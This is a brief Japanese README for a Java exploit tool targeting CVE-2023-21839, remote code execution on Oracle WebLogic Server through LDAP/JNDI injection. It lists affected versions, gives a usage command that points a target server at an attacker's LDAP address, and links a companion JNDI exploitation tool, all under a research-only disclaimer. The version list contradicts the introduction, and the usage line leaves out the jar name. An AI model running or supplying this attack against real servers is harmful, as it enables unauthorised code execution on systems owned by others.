
CVE-2023-21839を標的としたJavaベースのエクスプロイトで、LDAPインジェクションを介してOracle WebLogic Serverバージョン12.2.1.3.0および12.2.1.4.0のリモートコード実行を行います。
CVE-2023-21839 は、ネット上で公開されている PoC を元に作成されたツールです。
影響を受けるバージョン
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
使用方法
java -jar ターゲットIP:ポート LDAPアドレス
推奨ツール:
https://github.com/WhiteHSBG/JNDIExploit
このツールは、サイバーセキュリティの攻防研究のための情報交換のみを目的としています。利用者は、サイバーセキュリティ法に従って適切に使用してください。
利用者がこのツールを使用して不正な攻撃などの違法行為を行った場合、その責任は作者には一切ありません。